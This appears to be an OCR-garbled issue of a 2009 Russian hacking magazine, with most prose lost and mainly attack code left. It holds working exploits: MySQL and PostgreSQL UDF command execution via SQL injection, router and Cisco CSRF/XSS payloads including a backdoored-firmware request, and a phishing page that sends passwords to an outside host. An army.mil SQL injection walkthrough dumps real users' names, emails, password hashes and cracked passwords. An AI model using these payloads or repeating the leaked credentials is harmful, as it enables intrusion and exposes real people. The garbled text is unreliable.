autorun.inf, : UseAutoPlay=1. X:\Dump.
Ipod, aliveintheory.110mb.
com/IPODSWITCHBLADE.zip. : , Ipoda
.exe-. . hak5,
. ,
progstart.bat. !
X:\iPod_Config\Dump.
040
: wiki.hak5.
org/wiki/USB_Switchblade#Max_Damage_Technique.
,
Silivrenions Technique. XP SP 2, ,
( Windows
Wireless Zero Configuration, netcat ..). , ExeScript (hide-folder.com/overview/hf_7.html),

(.bat, .vbs .js, WSF, WSH, HTA) .
!
. ,
X 03 /123/ 09
>>
:
(, ..)
:
LFI, , - . ,
FreeBSD, , .
(CentOS, Linux),
? , ( , passwd)
.
, DVD:
import sys, httplib, urllib2, socket, time, re
# , , /etc/passed
Search = "root:"
#Verbose Mode On = 1
Verbose = 0
#
vulns = "http://packetstormsecurity.org/fuzzer/
dirTraversal.txt"
#
TTW = "2"
def main(host, path):
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
okresp, reason, headers = h.getreply()
:
,
. , NMAP
. ?
? : (
TCP OPTIONS, ,
), .
.
. telnet-:
1. telnetrecon (computec.
ch/projekte/telnetrecon), telnet- (TCP
23) .
2. , , ASCII-:
return okresp, reason, headers.get("Server")

def getsource(line):
try:
source = urllib2.urlopen("http://"+line).read()
if Verbose == 1:
print "Source:,len(source)
if re.search(Search.lower(), source.lower())\
!= None:
print "\n[!] LFI:", line, "\n"
except(urllib2.HTTPError, urllib2.URLError), msg:
print "[-] Received Error:", msg
socket.setdefaulttimeout(10)
...
print "\n[+] Host:",host
print "[+] File:",x
print "[+] Search:",Search
print "[+] Time to wait:", TTW, "seconds"
print "[+] Server:", server
print "[+] Response:", okresp, reason
print "[+] Paths Loaded:",len(paths)
if Verbose == 1:
print "[+] Verbose Mode On\n"
else:
print "[+] Verbose Mode Off\n"
"253" DO [0xdf]
"37" Authentication option (RFC 2941)
"255" IAC-byte
"251" WILL [0xfb] z
TelnetRecon
255-253-37-255-251-255-251-255-253-92-39-255-253-255-253-255-251
Windows XP.
3. Telnet RFC 854.
:
"255" IAC-byte
X 03 /123/ 09
041
>>
SKVOZ
01
://
MOZILLA
FIREFOX (CLICKJACKING)
>> Brief
.
Clickjacking,
. (
),

-. , , clickjacking. ,
, :
Adobe Flash Player, Internet Explorer, Opera, Safari Firefox. , - ,
:
! Firefox
NoScript JS-
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
onclick=updatebox(event), .
, , Google Chrome.
>> Targets:
Google Chrome 1.0.154.43/Mozilla Firefox 3.0.5/IE 7.0
>> Exploit
http://seclists.org/bugtraq/2009/Jan/0268.html
>> Solution
Firefox ,
. - , Noscript. IE 8
XSSFilter, NoScript .
Opera .
ifrme, .
. inline-. opera:config,
IFrames ( ).
02
XSSFilter IE 8
042
FULL-DISCLOURE
MYSQL UDF-
>> Brief
.

.
.
MySQL User-Defined (UDF)
,
. .
X 03 /123/ 09
>>
raptor_udf2.c (0xdeadbeef.info/exploits/raptor_udf2.c).
, : -
.

(dybnamic-link library Windows) shared object (Unix/Linux-like)
load_file , , SQL-injection.
:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
#
$ gcc -g -c raptor_udf.c
$ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_
udf.so raptor_udf.o lc
# ,
.so
$ mysql -u root -p
Enter password:
[...]
# - , ,
mysql:
mysql> use mysql;
# blob
mysql> create table foo(line blob);
#
mysql> insert into foo values(load_file('/home/raptor/
raptor_udf.so'));
# malicious-
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
mysql> create function do_system returns integer soname
'raptor_udf.so';
mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name
| ret | dl
| type
+-----------+-----+---------------+----------+
| do_system |
2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.
raptor /tmp/out');
mysql> \! Sh
#
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon
),3(sys),4(adm)
, MySQL
5.x. ,
sys_eval, sys_exec. 1 0. ,

lib_mysqludf_sys, sys_exec sys_eval.
$ wget --no-check-certificate https://svn.sqlmap.org/
sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_
sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
#
gcc -Wall -I/usr/include/mysql -I. shared lib_
mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)
# - ,
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
|0|
+-----------------------------------+
mysql> exit
Bye
$ ls -l /tmp/test_mysql
rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_
mysql
>> Targets
MySQL 5.0+
>> Exploit

SQL-injection svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/
mysqludfsys/.
raptor

MySQL
. ,
(mysqludf.org).
( ),
lib_mysqludf_sys (mysqludf.org/lib_mysqludf_sys/index.php), :
sys_exec ex
sys_get
sys_set ,
X 03 /123/ 09
043
>>
AppArmor . WEB
>> Solution
, .
,
, AppArmor. , AppArmor
WEB-application . , , (DAC) (MAC). ,
. AppArmor:
sudo apparmor_status
[...]
1 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.
1 processes are unconfined but have a profile defined.
/usr/sbin/mysqld (5128)
$ mysql -u root -p mysql Enter password:
[...]
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
||
+----------------+
!
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| 32512 |
+----------------+
mysql> exit
Bye
# AppArmor:
$ sudo /etc/init.d/apparmor stop
Unloading AppArmor profiles : done.
$ sudo apparmor_status
[...]
0 processes have profiles defined.
0 processes are in enforce mode :
044

IOCTL
0 processes are in complain mode.

0 processes are unconfined but have a profile defined.
$ mysql -u root -p mysql
Enter password:
[...]
mysql> select sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
|0|
+----------------+
03
POSTGRESQL UDF
>> Brief
UDF .
UDF
- ( , ,
, ). PostgreSQL .
libc system(). ,
pgshell (leidecker.info/projects/pgshell.
shtml).
? SQL-injection:
/store.php?id=1; <Injection>
Postgree SQL 8.1 UDF . , :

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/
libc.so.6', 'system' LANGUAGE 'C' STRICT.
, system() INT-,
X 03 /123/ 09
>>
HTTP

stdout-.
:
# ,
/store.php?id=1; CREATE TABLE stdout(id serial, system_
out text)
#
/store.php?id=1; CREATE FUNCTION system(cstring)
RETURNS int AS /lib/libc.so.6','system' LANGUAGE 'C'
STRICT -# -

/store.php?id=1; SELECT system('uname -a > /tmp/test')
# ,
system_out
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/
test'
#
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout
FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
Procedural Language
Function (PL/tcl, PL/pl, PL/python). , Postgree

.
# , PL/Python
/store.php?id=1; SELECT count(*) FROM pg_language WHERE
lanname=plpythonu
# ,
/store.php?id=1; CREATE LANGUAGE plpythonu
# , ,
Python
/store.php?id=1; CREATE FUNCTION proxyshell(text)
RETURNS text AS import os; return os.popen(args[0]).
read() LANGUAGE plpythonu
#
/store.php?id=1 UNION ALL SELECT NULL,
proxyshell(whoami), NULL OFFSET 1;--
PL/Perl:
# PL/Perl
SELECT count(*) FROM pg_language WHERE lanname=plperlu
X 03 /123/ 09
# CREATE FUNCTION
proxyshell(text) RETURNS text AS 'open(FD,"$_[0]
|");return join("",<FD>);' LANGUAGE plperlu
#
SELECT proxyshell(os command);
>> Targets
PostgreSQL 8.2/8.3/8.4
>> Exploits
http://milw0rm.com/sploits/2009-lib_postgresqludf_
sys_0.0.1.tar.gz
>> Solution
MySQL.
PGP DESKTOP 9.0.6

LOCAL
DENIAL OF SERVICE
04
>> Brief:

,
-, .
PGP
PGPwded.sys,
. ,
IOCTL (0x80022038):
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062
, IOCTL /. ,
ioctl
( ,
, ).
command arg ,
,
. , -
045
>>

Google Dork GHDB
AXIS 70U Network Document Server

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e), ,
.
. , ,
,
.
: IOCTL-proxy
(orange-bat.com/code/ioctl-proxy.zip), kartoffel (kartoffel.reversemode.
com/downloads.php).
>> Targets
PGP Desktop 9.0.6 [Build 6060]
>> Exploits
http://www.evilfingers.com/
advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php.
>> Solution
.
05
, , ,
, (WEB-;
, ). , :
: AXIS
AXIS 70U Network Document Server
: XSS +
:
XSS:
http://[server]/user/help/help.shtml?<script>alert(
'XSS')</script>
http://[server]/user/help/general_help_user.shtml?<
script>alert('XSS')</script>
(user/help/help.shtml), :
http://[server]/user/help/help.shtml?/admin/this_
server/this_server.shtml
: Profense
Profense Web Application Firewall
: XSRF / XSS
:
,
OWASP .
, , WEB-, !
SSH/SNMP:
046
46
<img src=https://10.1.1.199:2000/ajax.
html?hostname=profense.mydomain.com&gateway=
10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max_src_
conn=100&max_src_conn_rate_num=100&max_src_conn_
rate_sec=10&blacklist_exp=3600&ntp=ntp.hacked.
com&timezone=CET&syslog=syslog.hacked.com&syslog_
ext_l=4&snmp_public=public&snmp_location=&contact=
admin%40mydomain.com&ftp_server=ftp.hacked.com&ftp_
port=21&ftp_login=user&ftp_passwd=password&ftp_
remote_dir=%2Fhijacked_log&scp_server=scp.hacked.
com&scp_port=22&scp_login=admin&scp_remote_
dir=%2Fhijacked_log&ftp_auto_on=on&scp_auto_
on=on&ssh_on=on&remote_support_on=on&action=configur
ation&do=save>
Apply new configurations:
<img src=https://10.1.1.199:2000/ajax.html?action=res
tart&do=core>
proxy:
html?vhost_proto=http&vhost=vhost.com&vhost_
port=80&rhost_proto=http&rhost=10.1.1.1&rho
st_port=80&mode_pass=on&xmle=on&enable_file_
upload=on&static_passthrough=on&action=add&do=save>
( ):
html?action=shutdown>
XSS:
https://10.1.1.199:2000/proxy.html?action=manage&ma
in=log&show=deny_log&proxy=><script>alert(document.
cookie)</script>
: DLINK
D-link VoIP Phone Adapter
: + XSS
:
CSRF- :
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Upda
te?16640,0,0,0,0,0,0,0,0" method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="FirmwareUpdate"
value="enabled">
<input name="FileName" value="backdoored_firmware.
img">
<input type=submit value="attack">
</form>
</html>
.
XSS:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscri
X 03 /123/ 09
>>
pt%3Ealert(%22hacked%22)%3C/script%3E
: 3COM
3Com OfficeConnect Wireless Cable/DSL Router
:
:
,
. - .

CGI-. , (System Tools
Configuration Backup Configuration). , , ,
, (config.bin).
, , , ,
wifi-, snmp- .
http://<IP>/SaveCfgFile.cgi
config.bin:
pppoe_username=xxxxxxxxxxxxxxx
pppoe_password=xxxxxxxxx
pppoe_service_name=xxxxxxxxx
[...]
mradius_username=xxxxxx
mradius_password=xxxxxx
mradius_secret=xxxxxxx
[...]
Remote
Administration:
http://www.securityfocus.com/archive/1/500762/30/0/threaded.
: CISCO
CISCO IOS
: XSRF/XSS
:
HTTP-:
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0 192.168.1.2 YES NVRAM
up up
XSS:
http://192.168.1.2/level/15/exec/-/"><body
onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload = alert
("bug")>
http://192.168.1.2/exec/"><body onload="alert('bug');">
CSRF ( ):
http://192.168.1.2/level/15/exec/-/"><body onload=window.
location ='http://192.168.1.2/level/15/configure/-/hostname
/BUGGY/CR'>
:
Digital Security Research Group [DSecRG],
BinaryVision, Luca Carettoni (luca.carettoni[at]ikkisoft[dot]com). z
X 03 /123/ 09
47
>>
SKVOZ
ARMY.MIL

WEB-
. , .
?
. .
z
Army.mil.
, Zone-h.
org,
.
( ), ( , ),
( ).
, ,
katharsis
( US Army HACK katharsis.
bplaced.net/armyhack.htm). (cpma.apg.army.mil, 2rotc.
army.mil) 2000 Crime boys.
, ,
soa.mdw.army.mil, mdw.army.mil, mdwweb.
mdw.army.mil spiritofamerica.mdw.army.mil.
, .
!
.
:
http://www4.army.mil/otf/story.php?id=1
http://www4.army.mil/otf/story.php?id=-31337
, SQL-injection
048
Web Application Security Consortium.

,
:
import os, sys, httplib
#
p = 'http://www4.army.mil/otf/story.php?id=1+AND+1=2+U
NION+SELECT+'
def find(host, p):
try: # 0,1,2,3,4
for i in range(50):
colls = p+str(i)+','
#
h.putrequest('GET', colls)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain)
h.endheaders()
errcode, errmsg, headers = h.getreply()
if errcode==200:
print cools
except:
pass
find(p)
:
X 03 /123/ 09
>>
SQL-injection

http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15--
, SELECT.
, . ,
.
:
, , :
1=2+UNION+SELECT+0,1,concat(user(),0x20,data
base(),0x20,version()),3,4,5,6,7,8,9,10,11,
12,13,14,15--
:
: otf_web_user@localhost
: otf
: 4.1.22-log
chris.clarke 4fe249b9a8080a4d405517a27fddb55
a chris.clarke1@us.army.mil
meghan.moran a21100b6490a2006ab94efa9580e987
6 moranm@fleishman.com
michael.katsufrakis fb4b04a6b48d626f4d8c25fb
1c3fcba2 michael.katsufrakis@us.army.mil
ryans aca2a6fcdc09c1699458fd55abcfcaf3 ryans@
fleishman.com
hayesn 717e17492ae4b0ec6d5aeb2d250fe442
hayesn@fleishman.com
dvd

700

.

!
: http://www4.army.mil/otf/admin/Login/login.php.
, ,
. ,
OTF (www4.army.mil/otf).
-, CMS
,
. , .
. MySQL 4.* . (information_schema)
5.*,
, users:

,
,
ARNEWS ( ).
, :
http://www4.army.mil/ocpa/read.php?story_id_
key=5061
:
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15+FROM+users ()
.
:
http://www4.army.mil/otf/story.php?id=1+AN
D+1=2+UNION+SELECT+0,1,count(user_username)
,3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+users
(, 5 )
http://www4.army.mil/otf/story.php?id=
1+AND+1=2+UNION+SELECT+0,1,concat(user_
username,0x20,user_pw,0x20,user_email),3,4,
5,6,7,8,9,10,11,12,13,14,15+FROM+users+LIMI
T+1,2
http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,conca
t(database(),0x20,%20user()),5,6,7,8,9,10,11- http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,con
cat(user_username,0x20,user_pw,0x20,user_ema
il),5,6,7,8,9,10,11+FROM+users
, :
database: ocpa
user: OCPAuserbasic@localhost
:
[0] zack.kevit:04dac8afe0ca501587bad66f6b5ce5ad:
, LIMIT X 03 /123/ 09
zack.kevit@l-3com.com:zack.kevit@l-3com.com:
049
>>
, .
,

! ,
system_all. ,
[2] patricia.downs:5c6af66e2e7e5fe23c434b3f5c4ec2bf:patricia.
downs@smc.army.mil:
[3] laura.defrancisco:c8b1b73225e5896e06c19b1f609dc863:laura.
defrancisco@hqda.army.mil:
[4] robbie.thompson:b6917881d58688ad396501f773b5d647:robbie.
thompson@l-3com.com:
[5] ashley.stetter:ea13ba548da671076ec1a3a03cbd2a40:ashley.
stetter@hqda.army.mil:
[6] kerry.meeker:c8b1b73225e5896e06c19b1f609dc863:kerry.
meeker@hqda.army.mil:
[7] david.hamric:55231502f554ef71faa789d1a135866a:david.
, ,
(junior) (system_all)
hamric@l-3com.com:
[8] will.brall:cb7cd4c336c25560286fe69b55335325:will.brall@
[15] deepa.mahendru:5782db43cea274ab2e45c4f36318aea0:deepa.
us.army.mil:
mahendru@l-3com.com:
[9] assignment.desk:4a29dd4f50d00f8e84480238e4cb3ff0:
[16]michael.rautio:f956f3f32257f69b4bd165336a9c7869:michael.
assignmentdesk@smc.army.mil:
rautio@smc.us.army.mil:michael.rautio@smc.us.army.mil:
[10] michael.katsufrakis:fb4b04a6b48d626f4d8c25fb1c3fcba2:
michael.katsufrakis@us.army.mil:
[11] victor.harris:f9bbe1e289e380058aa0dc0500e216ce:victor.
harris@us.army.mil:
[12] emma.dozier:c6e6c426dbc367dfdbfea3d070b5acc3:emma.
dozier@smc.army.mil:
[13] chris.clarke1:e7ea3d9b4e0ea932fbdea34f2b56ed77:chris.
clarke1@us.army.mil:
[14] jacques.bannamon:2928789921c530d855f395bddf87536f:
jacques.bannamon@smc.army.mil:
. ,
().
: H = Llog2N=L logN/log2, L , N .
, ottomotto, L=9, N=26 (
). , , , 4.9 ,
. , N=94 (
ASCII) 6.55.
, :
b6917881d58688ad396501f773b5d647:7779311
obbie.thompson:b6917881d58688ad396501f773b5d647:
robbie.thompson@l-3com.com:
login: obbie.thompson
pass: 7779311
04dac8afe0ca501587bad66f6b5ce5ad:hellokitty
zack.kevit:04dac8afe0ca501587bad66f6b5ce5ad:zack.
kevit@l-3com.com:zack.kevit@l-3com.com:
login: zack.kevit
pass: hellokitty
.
. .
,
, 19 . : http://www4.army.mil/ocpa/admin.
, . ,
050
X 03 /123/ 09
>>
OTF. LIMIT
CMS
ARNEWS
- , .

,
SQL-injection
. - , .
. ,
HEAD- .
,
. , robots.txt ( ,
, ). sqlite,
.
import os, sys, sqlite3, httplib, re, locale
# -*- coding: utf-8 -*import thread, sqlite3
# ,
dires = []
#
HEAD
def check(host, p):
try:
h.putrequest('HEAD', p)
h.putheader('Host', host)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain')
h.endheaders()
errcode, errmsg, headers = h.getreply()
if (errcode==200) and (len(headers)!=0):
dires.append(p)
except:
pass
# robots.txt,
, , :
def robots(host):
global dires
try:
f = urllib.urlopen('http://'+host+'/robots.txt)
line = f.read()
txt = re.findall('Disallow: (.*)$', str(line),
re.MULTILINE)
for i in txt:
if i=='/' or i=='/\r':
pass
else:
X 03 /123/ 09
dires.append(i)
except IOError:
pass
# ,

def dirs(host):
global dires
conn = sqlite3.connect('db')
c = conn.cursor()
c.execute('SELECT * FROM Directories')
for row in c:
thread.start_new_thread(check,(host, row[1]))
thread.start_new_thread(robots, (host,))
# python-:

list(set(dires))
#
locale.setlocale(locale.LC_ALL, '')
tmp = [x.swapcase() for x in list(set(dires))]
tmp.sort(key=locale.strxfrm)
tmp = [x.swapcase() for x in tmp]
return tmp
dirs('army.mil')
, OWSP
Dirbuster ( ettee). , JAVA.
( , WEB-). owasp.org/index.php/Category:
OWASP_DirBuster_Project. : java
-jar DirBuster-0.12.jar -H -u https://127.0.0.1/ ( )
java -jar DirBuster-0.12.jar -u https://127.0.0.1/ (GUI).
? ,
200 , , ,
,
.
, , , , .
(
1273819 ).

,
, . ,
,
.
. z
051
>>
S4AVRD0W
/ S4AVRD0W@P0C.RU /

CMS EZ PUBLISH
CMS
, web- . ,
.
, .

. ,

.
mod_rewrite, server-side .
, SQL-
. .
, HTML-
: content="eZ publish".
, , , Open source
CMS eZPublish. . /ezinfo/about, CMS .
eZPublish 3.9.3.
CMS
( ).
eZPublish, , , (privilege escalation). . ,
, ,
, .
.
052
, CMS, , , white-box. All-In-One ,

Next.
.
.

, ,
- .
, , ,
.
.
, web-shell, CMS ( PHP).
.
, , , .
.htaccess
web-, :
X 03 /123/ 09
>>
info
CMS
...
<FilesMatch ".">
order allow,deny
deny from all
</FilesMatch>
<FilesMatch "(index\.php|\
.(gif|jpe?g|png|css|js|html)|var(.+)storage.
pdf(.+)\.pdf)$">
order allow,deny
allow from all
</FilesMatch>
RewriteEngine On
RewriteRule !\.(gif|jpe?g|png|css|js|html)|v
ar(.+)storage.pdf(.+)\.pdf$ index.php
...
-
web- .
. -,
X 03 /123/ 09

, . -,
web-shell ( ).

. CMS, ,
web-.
- : ,
.
eZPublish
advisory, . ,
,
. , .
, .
OWASP WebScarab (, !) ,
.

,
/user/success, ,

e-mail. ! SMTP ,
. ,
, ,
.

WebScarab, ,
. ,

web-
white-box

.
mktime()

Unix,
,

/
Unix
(The Unix Epoch, 1
1970 ).
warning
! ,

!
053
>>
ZERO-DAY
,
. :
...
if( $type == EZ_USER_PASSWORD_HASH_MD5_USER )
{
$str = md5( "$user\n$password" );
}
...
, .
, ,
UserId, ezuser .
,
CMS. , .
, , , :
. ,
? ! , ,

.
SMTP- CMS POST-

. ,
.
, CMS
.
. ,
, ,
, .
, , target-
( ). ,
.
CMS.
054
, .
, ,
.
, ,
, (
). , , InsidePro Password Pro

.
, , :
...
// Create enable account hash and send it to the newly
registered user
$hash = md5( mktime( ) . $user->attribute(
'contentobject_id' )
...
, mktime( ) , web-.
contentobject_id ,
. , eZPublish,
.
HTTP, , .
,
CMS .
, eZPublish .

, , eZPublish PHP? , CMS
X 03 /123/ 09
>>
eZPublish
dvd

poc-
,
.
. , : .
, , . , PHP-
CMS. . eZPublish,
.
eZPublish,

.
ezpkg. zip,

ezpkg. , ,
( , PHP),
package.xml.
eZPublish,
web- CMS , - ,
. ,
.htaccess, FilesMatch RewriteEngine. ,
X 03 /123/ 09
apache AllowOverride None, FilesMatch

.htaccess .

xml, . (Path traversal),
package.xml. ,
web- , ,
ezinfo.php.
, ,
. web-. apache,

, ,
web-.

.
SQL-, File-
web. ,
. . ! z
055
>>
D0ZNP
/ HTTP://OXOD.RU /
APPLE IPHONE
. Apple Apple iPhone. , , !

, .
Unix based, darwin kernel! .
IPHONE 3G: , !
, Apple
iPhone 3g. : GSM- 3g, A-GPS
. ,
, . ,
. , - ( 2.2).
SDK, - Apple Store.
,
056
. ,
.
iPhone
WinPWN.

Installer ( 4- ) Cydia ( Debian package).
, ,
Apple Store. Installer Cydia ,
.
X 03 /123/ 09
>>
SQL-injection
iframe src
0. SSHD DEFAULT
. , :
iPhone SSH-, , . , , iPhone
tunnel, USB network. SSHD, ( ). /etc/master.
passwd:
. , :)
alpine. ,
-, iPhone
22 : mobile/alpine root/alpine. ? ,
, . ,
. : ,
(
). ,
iPhone 3g , 22
.
##
1. INSTALLER REPOSITORY SPOOFING
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/
false
root:/smx7MYTQIi2M:0:0::0:0:System
Administrator:/var/
root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/
bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/
false
_mdnsresponder:*:65:65::0:0:mDNSResponder:/var/empty:/usr/
bin/false
,
Installer RipDev. ,
- (,
httpd busybox).
DNS- IP- - ( busy box). iPhone-,
(
- Godlen_Wifi :))
, . xml- zip- . ,
. , !
:
_sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/
http://i.ripdev.com/seed/repo-r1050.zip
usr/bin/false
_unknown:*:99:99::0:0:Unknown
false
X 03 /123/ 09
User:/var/empty:/usr/bin/
, -
057
>>
- date version ,
. xml-
url:
. ,
Installer. http://i.ripdev.com/
info/index-2.2.plist, , , :
<dict>
<key>category</key>
<string>System</string>
<key>date</key>
<string>1232132864</string>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>url</key>
<string>http://i.ripdev.com/info/com.ripdev.install4.0-2.2.plist</string>
</dict>
, -
058
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//
EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>size</key>
<integer>565635</integer>
<key>hash</key>
<string>3d916b3d60c5c31c66e652f2c5711832</string>
<key>location</key>
<string>http://i.ripdev.com/packages/System/installer40.zip</string>
</dict>
</plist>
version ,
. size,
. hash.
regenerate.php:
$r['hash'] = md5_file($fullpath);
, , . - . , url- . , .
, iPhone , .
2. EXPLOITS
- Safari .
MacOs. .
libtiff,
. javascript-. , :
WebKit , iPhone ,
.
iPhone. -,
. -, . :
http://www.iphoneworld.ca/exploits/crash-my-iphone.
html
X 03 /123/ 09
>>
, , , ,
, html-
iPhone. , html-:
<a href=http://google.ru>http://yandex.ru</a>
, . http://yandex.ru, ,
, http://google.ru. , e-mail
, : http://yandex.
ru,
. .
, . ,
<a href="%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%72
%75">http://yandex.ru</a>
,
. http://:
<a
href="http://%67%6F%6F%67%6C%65%2E%72%75">http://
yandex.ru</a>
AppleStore
http://www.iphoneworld.ca/exploits/iphone-crash.html
( ) 2.2.
-.
(http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybeyours.html), ( , )
- iPhone. , H.D.Moore,
, .
, 25 2007 !
( ) .
,
Safari. - : ;).
3. FISHING/XSS
, ,
: iPhone,
XSS. , , . , .
,
iPhone,
.
, ,
- .
, , . X 03 /123/ 09
,
. ,
. ,
title alt. ,
, AppleStore ( , , )
iframe . ,
HTML-. Safari
, , ,
. , :
<?php
$fish='
<html>
<body bgcolor="white">
<form method="GET" action="http://creditmne.ru/x/f/
i.php" name="fakeform" id="fakeform" width="278">
<tableborder="0"style="width:278px;height:175px;paddin
g-top:0px;padding-right:0px;padding-left:0px;paddingbottom:0px" width="278" height="175" cellpadding="0"
cellspacing="0">
<tr width="278">
<td colspan="4">
<img src="r11.gif" width="278" height="78"/>
</td>
</tr>
<tr width="278">
<td width="8" colspan="1">
<img src="r21.gif" border="0" width="8" height="30"/>
</td>
<td colspan="2" width="0">
<input type="password" style="width:262;height:30"
name="fpass" value="">
</td>
<td width="8" colspan="1">
<img src="r23.gif" style="margin-left:-115px"
border="0" width="8" height="30"/>
</td>
</tr>
<tr >
059
>>
info

AppleStore
javascript:
prompt('user@
yahoo.com').
,

iTunes ,

javascript.

DNS-.
links
http://www.
skyhookwireless.com

MAC-

.
http://blog.metasploit.
com/2007/09/rootshell-in-my-pocketand-maybe-yours.
html MetaSploit
Framework
iPhone.
warning
!
! ,

!
060
<td colspan="2" >

<input type="image" border="0" src="r31.
gif" width="139" height="66"/>
</td>
<td colspan="2" >
<input type="image" border="0" src="r32.
gif"width="139" height="66"/>
</td>
</td>
</table>
</form>
</body>
</html>';
$pass = $_GET["fpass"];
if (strlen($pass)!=0) echo "<h1>password
sniffed: ".$_GET["fpass"]."</h1>";
else echo $fish;
?>
. .
-, . , x y,
, -
. POST . , .
, javascript.
! . , .
iframe. , :
AppleStore.
10 !
<iframe src="http://ya.ru" />
.
, javascript
.
:
<?php
setcookie("user", "test", time()+3600);
foreach ($_COOKIE as $cookie_name => $cookie_
value) {
print("<li>" . htmlspecialchars($cookie_name)
. "=" . htmlspecialchars($cookie_value) . "</
li>");
}
print("<h2>server array: ");
$tmp=fopen("iphone-mail.txt","w");
foreach($_SERVER as $key_name => $key_value) {
fputs($tmp, $key_name . " = " . $key_value
. "\n");
print( $key_name . " = " . $key_value .
"<br>");
}
fclose($tmp);
print("</h2>");
?>
cookies , - Safari:
HTTP_USER_AGENT
=
Mozilla/5.0
(iPhone;
U; CPU iPhone OS 2_2 like Mac OS X; ru-ru)
AppleWebKit/525.18.1 (KHTML, like Gecko)
HTTP_ACCEPT
=
text/xml,application/
xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/
*;q=0.5
HTTP_ACCEPT_LANGUAGE = ru
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_CONNECTION = keep-alive
SERVER_ADMIN = [no address given]
REMOTE_PORT = 6084
SERVER_PROTOCOL = HTTP/1.1
REQUEST_METHOD = GET
QUERY_STRING =
argv = Array
argc = 0
, , ,
<iframe src=/>
iframe
. - width height
. , .
, .
, src= (,
src="blablabla")
. ( ) 3-4 . ,
, .
